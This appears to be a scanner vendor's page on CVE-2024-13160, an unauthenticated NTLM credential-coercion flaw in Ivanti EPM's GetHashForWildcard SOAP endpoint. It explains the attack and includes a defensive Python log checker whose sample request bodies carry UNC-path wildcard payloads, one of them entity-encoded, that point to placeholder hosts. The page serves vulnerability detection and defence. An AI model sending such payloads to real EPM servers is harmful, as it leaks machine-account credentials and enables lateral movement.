CVE-2024-13160 Scanner

Ivanti EPM - Credential Coercion Vulnerability in GetHashForWildcard CVE-2024-13160 Scanner

Short Info

Level: Critical
Single Scan
Can be used by: Asset Owner
Estimated Time: 10 seconds
Time Interval: 20 days 17 hours
Scan only one: Domain, Subdomain, IPv4
Toolbox: -

Ivanti Endpoint Manager (EPM) is a comprehensive solution for managing and securing endpoints across corporate environments. IT administrators commonly use it for asset management, patch management, and security configuration across a range of endpoints, and enterprises rely on it to streamline device and application management and to protect their infrastructure from a variety of cyber threats. A critical vulnerability has been discovered in Ivanti EPM that could allow an unauthenticated attacker to exploit its GetHashForWildcard endpoint. It is found in versions that do not enforce proper input validation on certain parameters, which exposes those systems to unauthorized access. A patch or mitigation is required to resolve this security issue.

This vulnerability allows attackers to perform credential coercion attacks. It arises due to improper input validation in the wildcard parameter of the GetHashForWildcard endpoint in Ivanti EPM. By specifying a remote UNC path, attackers can force the machine account to authenticate using NTLM, leading to the potential disclosure of sensitive credentials. The vulnerability is triggered via a crafted request to the endpoint, which doesn’t properly validate the provided input. This lack of validation could allow attackers to bypass security mechanisms and access sensitive data. If exploited, the vulnerability can provide attackers with unauthorized access to internal systems or services.

The vulnerability is triggered when the GetHashForWildcard endpoint is called with a malicious value in the wildcard parameter. When that value points to a remote UNC path, the server attempts NTLM authentication to it, leaking sensitive credentials. The root cause is insufficient input validation, which lets an attacker place a crafted payload in the request. The affected endpoint is located in the WSVulnerabilityCore service, which accepts SOAP-based requests. The 'wildcard' element of the request directs the vulnerable system to authenticate to a malicious server under the attacker's control. Exploiting this endpoint requires no authentication, which makes it especially dangerous: any attacker with network access can reach it.
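
A defender-side check for the pattern described above, as an added example that is not part of the original page or of Ivanti's code: it parses captured SOAP request bodies (for instance from a reverse proxy or WAF log) and reports GetHashForWildcard calls whose wildcard value is a UNC path. The envelope contents, the `urn:example:constructed` namespace, the sample values, and the names `classify`, `local` and `UNC_RE` are assumptions made for illustration.

```python
import re
import xml.etree.ElementTree as ET

# UNC-style value: two leading separators, then a host, then a separator.
# Windows accepts '/' as well as '\', so both are matched.
UNC_RE = re.compile(r'^\s*[\\/]{2}([^\\/\s]+)[\\/]')

def local(tag):
    """Drop the '{namespace}' prefix so matching does not depend on the service namespace."""
    return tag.rsplit('}', 1)[-1].lower()

def classify(soap_body):
    """Return (verdict, host): 'unc', 'clean', or 'unparseable' (needs manual review)."""
    if '<!doctype' in soap_body.lower():
        return ('unparseable', None)   # do not expand DTDs/entities from logged traffic
    try:
        root = ET.fromstring(soap_body)
    except ET.ParseError:
        return ('unparseable', None)
    for op in root.iter():
        if local(op.tag) != 'gethashforwildcard':
            continue
        for el in op.iter():
            # Parsing first means character references (&#92;) are already decoded here.
            m = UNC_RE.match(el.text or '') if local(el.tag) == 'wildcard' else None
            if m:
                return ('unc', m.group(1))
    return ('clean', None)

ENV = ('<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>'
       '<GetHashForWildcard xmlns="urn:example:constructed"><wildcard>%s</wildcard>'
       '</GetHashForWildcard></s:Body></s:Envelope>')
# Constructed sample bodies (documentation address/hostname, placeholder namespace).
SAMPLE_UNC = ENV % r'\\192.0.2.10\share\*'
SAMPLE_ENCODED = ENV % '&#92;&#92;files.example.test&#92;x&#92;*'
SAMPLE_LOCAL = ENV % r'C:\patches\*.exe'

if __name__ == '__main__':
    for name, body in [('unc', SAMPLE_UNC), ('encoded', SAMPLE_ENCODED), ('local', SAMPLE_LOCAL)]:
        print(name, classify(body))
```

Bodies reported as 'unparseable' should be reviewed by hand rather than treated as clean, and the returned host can be correlated with outbound SMB connections from the EPM server.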

If an attacker successfully exploits this vulnerability, they could coerce the targeted Ivanti Endpoint Manager system into authenticating with a remote server under their control. This could lead to the compromise of sensitive credentials, which could be further leveraged to gain unauthorized access to additional systems within the network. The exposed credentials could be used to move laterally within the organization, escalating privileges or compromising other services. The attacker may also use the leaked credentials to launch more sophisticated attacks, such as credential stuffing or brute-forcing other accounts. Overall, this vulnerability poses a severe risk to the confidentiality, integrity, and availability of the targeted systems.
